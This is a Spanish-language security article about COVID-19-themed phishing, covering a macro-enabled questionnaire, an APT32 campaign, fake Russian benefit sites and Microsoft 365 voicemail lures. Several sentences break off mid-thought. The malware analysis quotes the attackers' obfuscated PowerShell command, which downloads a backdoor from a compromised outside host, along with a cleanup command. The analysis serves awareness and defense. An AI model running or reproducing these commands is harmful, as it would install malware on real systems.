Los atacantes continúan explotando el tema COVID-19, creando cada vez más amenazas para los usuarios que están muy interesados en todo lo relacionado con la epidemia. EN
recuerda en
¿Quieres una prueba gratuita de COVID-19?
Otro ejemplo significativo de phishing con temática de coronavirus fue
También fue fácil convencer a la mayoría de los usuarios para que habilitaran las macros. Para hacer esto, se utilizó un truco estándar: para completar el cuestionario, primero debe habilitar las macros, lo que significa ejecutar un script VBA.
Como puede ver, el script VBA está especialmente enmascarado contra los antivirus.
Windows tiene una función de espera donde la aplicación espera /T <segundos> antes de aceptar la respuesta predeterminada "Sí". En nuestro caso, el script esperó 65 segundos antes de eliminar los archivos temporales:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Y mientras esperaba, se descargó malware. Para esto se lanzó un script de PowerShell especial:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Después de decodificar el valor Base64, el script de PowerShell descarga la puerta trasera ubicada en el servidor web previamente pirateado de Alemania:
http://automatischer-staubsauger.com/feature/777777.png
y lo guarda con el nombre:
C:UsersPublictmpdirfile1.exe
Carpeta ‘C:UsersPublictmpdir’
se elimina al ejecutar el archivo 'tmps1.bat' que contiene el comando cmd /c mkdir ""C:UsersPublictmpdir"".
Ataque dirigido a agencias gubernamentales
Además, los analistas de FireEye informaron recientemente de un ataque APT32 dirigido a estructuras gubernamentales en Wuhan, así como al Ministerio de Gestión de Emergencias de China. Uno de los RTF distribuidos contenía un enlace a un artículo del New York Times titulado
Curiosamente, en el momento de la detección, ninguno de los antivirus detectó esta instancia, según Virustotal.
Cuando los sitios web oficiales están caídos
El ejemplo más sorprendente de un ataque de phishing ocurrió en Rusia el otro día. El motivo fue el nombramiento de una prestación tan esperada para niños de 3 a 16 años. Cuando se anunció el inicio de la aceptación de solicitudes el 12 de mayo de 2020, millones de personas acudieron al sitio web de Servicios del Estado en busca de la ayuda tan esperada y derribaron el portal no peor que un ataque DDoS profesional. Cuando el presidente dijo que “los servicios gubernamentales no podían hacer frente al flujo de solicitudes”, la gente empezó a hablar en línea sobre el lanzamiento de un sitio alternativo para aceptar solicitudes.
El problema es que varios sitios comenzaron a funcionar a la vez, y aunque uno, el real en posobie16.gosuslugi.ru, acepta solicitudes, otros
Los colegas de SearchInform encontraron alrededor de 30 nuevos dominios fraudulentos en la zona .ru. Infosecurity y Softline Company han rastreado más de 70 sitios web falsos similares de servicios gubernamentales desde principios de abril. Sus creadores manipulan símbolos familiares y también utilizan combinaciones de las palabras gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, etc.
Exageración e ingeniería social
Todos estos ejemplos no hacen más que confirmar que los atacantes están monetizando con éxito el tema del coronavirus. Y cuanto mayor es la tensión social y los temas menos claros, más posibilidades tienen los estafadores de robar datos importantes, obligar a las personas a renunciar a su dinero por su cuenta o simplemente piratear más computadoras.
Y dado que la pandemia ha obligado a personas potencialmente no preparadas a trabajar desde casa en masa, no sólo los datos personales, sino también los corporativos están en riesgo. Por ejemplo, recientemente los usuarios de Microsoft 365 (anteriormente Office 365) también fueron objeto de un ataque de phishing. La gente recibía mensajes de voz masivos “perdidos” como archivos adjuntos a cartas. Sin embargo, los archivos eran en realidad una página HTML que enviaba a las víctimas del ataque a
Fuente: habr.com